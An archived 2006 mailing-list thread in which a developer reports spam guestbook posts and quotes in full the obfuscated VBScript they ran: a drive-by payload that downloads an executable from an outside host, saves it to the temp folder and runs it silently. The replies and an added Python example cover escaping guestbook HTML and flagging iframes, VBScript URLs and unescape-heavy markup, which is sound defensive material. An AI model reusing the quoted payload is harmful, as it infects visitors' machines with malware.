You should have your guestbook not allow tags, or at least not allow
javascript.

Russ 
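Both options from the reply above, as an added example (Python, written for this page, not code from the thread or anyone in it): escape all markup in a guestbook entry so no tag survives, or flag entries carrying active content of the kind described in the thread (an iframe, a VBScript block, a heavily unescape()-obfuscated payload) so they can be rejected or held for moderation. The sample posts and the attacker.invalid host are constructed.

```python
import html
import re

# Markup the thread's spam relied on: an iframe pulling a page that ran
# dozens of unescape() calls before executing a VBScript block.
ACTIVE_CONTENT = re.compile(
    r"<\s*(script|iframe|object|embed|applet)\b"   # tags that load or run code
    r"|\bon\w+\s*="                                # inline event handlers
    r"|(javascript|vbscript):",                    # script: URLs
    re.IGNORECASE,
)
UNESCAPE_CALL = re.compile(r"\bunescape\s*\(", re.IGNORECASE)


def sanitize_entry(text: str) -> str:
    """Option 1: allow no tags at all.  Encoding < > & " ' makes the browser
    render the entry as text, so no element can be created from it."""
    return html.escape(text, quote=True)


def flag_entry(text: str, unescape_threshold: int = 10) -> list:
    """Option 2: report why an entry looks like active content.
    Returns a list of reasons; an empty list means nothing was found."""
    reasons = []
    m = ACTIVE_CONTENT.search(text)
    if m:
        reasons.append(f"active content: {m.group(0).strip()!r}")
    n = len(UNESCAPE_CALL.findall(text))
    if n >= unescape_threshold:
        reasons.append(f"{n} unescape() calls (obfuscated payload)")
    return reasons


# Constructed sample guestbook posts (not taken from the thread).
SAMPLE_POSTS = [
    "Great site, thanks for the CF tips!",
    "Nice work <b>Brad</b> :)",
    '<IFRAME src="http://attacker.invalid/p.htm" width=0 height=0></IFRAME>',
    '<script language="VBScript">On Error Resume Next</script>',
    '<a href="vbscript:MsgBox(1)">click</a>',
    '<img src=x onerror="alert(1)">',
]


def triage(posts):
    """Return (escaped_text, reasons) per post, as a moderation queue would."""
    return [(sanitize_entry(p), flag_entry(p)) for p in posts]


if __name__ == "__main__":
    for escaped, reasons in triage(SAMPLE_POSTS):
        print("REJECT" if reasons else "OK    ", escaped[:60], reasons)
```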

-----Original Message-----
From: Brad Wood [mailto:[EMAIL PROTECTED] 
Sent: 27 October 2006 23:37
To: CF-Talk
Subject: RE: weird VB exploit

Yep, that's what happened.  All I did was go and view my guestbook and my
antivirus went nuts.  What scares the heck out of me is that MS IE was going
to let the VBS execute those files with nary a warning.

[Insert obligatory FF > IE comments here from the peanut gallery]

That's why I thought maybe I just didn't have all the security patches
installed.

~Brad

-----Original Message-----
From: Munson, Jacob [mailto:[EMAIL PROTECTED]
Sent: Friday, October 27, 2006 5:04 PM
To: CF-Talk
Subject: RE: weird VB exploit

You lost me.  Are /you/ trying to run this VB script?  If not, why do you
care about /your/ version of IE?  It's the spammer's browser (or spam
tool) that matters.

Ok, after a reread, I think I understand better.  The spammer posted some
code that included an iframe.  When you load your guestbook in IE, you get a
bunch of virus warnings.  Do I have it right?

> -----Original Message-----
> From: Brad Wood [mailto:[EMAIL PROTECTED]
> Sent: Friday, October 27, 2006 1:14 PM
> To: CF-Talk
> Subject: weird VB exploit
> 
> Hey guys, I just got some spam posts on my guestbook which include an 
> iframe.  Inside the iframe a page is called which, after calling about 
> 80 unescape JavaScript functions, tries to execute the following VB 
> code.
> I realized it when my antivirus started going nuts telling me about 
> executable files it was trying to run.
> 
> Do I need a patch for IE?  (IE 6.0 on Windows 2000 SP4) I didn't think 
> a web page could execute arbitrary files from a web server.
> 
> <script language="VBScript">
> 
>  On Error Resume Next
> 
>  Function h2s(s)
> 
>  Dim i
> 
>  For i = 1 To Len(s) Step 2
> 
>   h2s = h2s & Chr("&" & "H" & Mid(s, i, 2))
> 
>  Next
> 
>  End Function
> 
>  Const sClassID =
> "636C7369643A42443936433535362D363541332D313144302D393833412D3
> 0304330344
> 6433239453336"
> 
>  Const sItem_1 = "41646F64622E53747265616D"
> 
>  Const sItem_2 =
> "536372697074696E672E46696C6553797374656D4F626A656374"
> 
>  Const sItem_3 = "4D6963726F736F66742E584D4C48545450"
> 
>  Const sItem_4 = "5368656C6C2E4170706C69636174696F6E"
> 
>  sFileURL = "http://money24online.com/file.exe";
> 
>  sFileName = "thw_expl.exe"
> 
>  Set DF = Document.createElement("object")
> 
>  Call DF.SetAttribute("classid", h2s(sClassID))
> 
>  Set AdoSream = DF.CreateObject(h2s(sItem_1), vbNullString)
> 
>  Set FS = DF.CreateObject(h2s(sItem_2), vbNullString)
> 
>  Set xml_http = DF.CreateObject(h2s(sItem_3), vbNullString)
> 
>  Call xml_http.Open("GET", sFileURL, False)
> 
>  Call xml_http.Send
> 
>  AdoSream.Type = 1
> 
>  Set tmp_path = FS.GetSpecialFolder(2)
> 
>  sFilePath = FS.BuildPath(tmp_path, sFileName)
> 
>  Call AdoSream.Open
> 
>  Call AdoSream.Write(xml_http.responseBody)
> 
>  Call AdoSream.SaveToFile(sFilePath, 2)
> 
>  Call AdoSream.Close
> 
>  Set Q = df.CreateObject(h2s(sItem_4), vbNullString)
> 
>  Call Q.ShellExecute(sFilePath, vbNullString, vbNullString, "open", 0)
> 
>  </script>
> 
>  
> 
> ~Brad
Archive: 
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:258344